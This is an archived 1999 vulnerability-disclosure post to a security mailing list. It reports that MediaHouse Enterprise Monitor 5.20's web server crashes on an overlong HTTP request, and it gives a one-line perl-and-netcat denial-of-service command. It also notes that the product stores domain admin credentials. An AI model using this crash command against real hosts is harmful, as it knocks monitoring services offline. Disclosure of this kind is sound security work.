=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 Date: Чт, 21 окт 1999  17:05:42

   От: Sebastian Andersson <bofh-exploitdev@DIEGEEKDIE.COM>

 Кому: VULN-DEV@SECURITYFOCUS.COM

 Тема: MediaHouse Enterprise Monitor 5.20

--------------------------------------------------------------------------------




        Hiya



"MediaHouse Enterprise Monitor 5.20" (<http://www.mediahouse.com/>) is

a network monitoring program with its own fucked up webserver running

on NT. I crashed it within 2 minutes after I got the url:



perl -e 'print "GET /" . "x"x9999 . "\r\n\r\n"' | nc host 8080



This program has a feature there it is able to reboot other NT machines

and for this to work, you have to store the domain admin name and

password in it. It also monitors stuff like radius servers there it need

usernames/passwords.



I don't know if this can be used for more than stupid DOS attacks and

I know too little about NT to explore this further.

Maybe someone else would like to give it a try?



There is a 30 day trial version to download from their website.



It seems like a rather nice network monitoring program if you put it on

a secure network.



/Sebastian